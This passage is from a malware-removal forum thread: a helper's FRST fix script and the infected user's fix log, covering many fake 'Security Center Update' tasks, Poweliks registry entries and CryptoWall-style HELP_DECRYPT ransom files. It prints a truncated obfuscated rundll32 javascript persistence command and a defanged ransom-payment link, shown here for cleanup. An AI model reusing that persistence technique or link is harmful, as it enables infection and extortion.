C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
Reboot:
end


NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..". The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

Information to Reply with >>>>
  • How did the uninstalling of the extra AV go?
  • The Fixlog.txt log file text.
  • How is your system running now?

  • 0

#6
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Norton had expired, so downloaded that tool and uninstalled with no problems.  Ran the fixlist (Might have messed up b/c I ran it in safe mode instead of normal :( ) and attached is that log.  Now I am up and running in normal mode, Internet Explorer will let me download files now.  I've had it up and running without any powershell errors as well.  But something still seems off, something is continuing to chew at resources and slowing it down and Windows Update will not allow me to check for updates, it says that the service isn't running.

 

Thanks again for all your help!!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-02-2015
Ran by Dorothy01 at 2015-02-24 06:07:45 Run:1
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Safe Mode (with Networking)
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
C:\Users\Dorothy01\AppData\Local\acikmao.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe"
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> No File
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No File
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
